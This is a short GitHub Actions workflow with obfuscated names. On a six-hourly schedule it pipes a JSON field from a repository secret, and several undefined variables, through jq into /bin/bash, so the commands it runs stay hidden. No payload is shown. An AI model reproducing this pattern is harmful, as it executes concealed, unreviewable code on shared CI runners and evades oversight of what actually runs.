name: gelinglanduo
on:
  workflow_dispatch:
  schedule:
    - cron: '51 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gelinglanduo
        env:
          oeea94: ${{ secrets.oeea94 }}
        run: |
          echo $oeea94 | jq -r .zjuot2 | /bin/bash
          echo $mcr923 | jq -r .kcywl5838 | /bin/bash
          echo $s237 | jq -r .f75047 | /bin/bash
          echo $wa49911 | jq -r .ijfd99020 | /bin/bash
          echo $i135 | jq -r .iwt7 | /bin/bash
          echo $tjcct183 | jq -r .zkndf0 | /bin/bash
          echo $qyqlo7128 | jq -r .wubjh80887 | /bin/bash

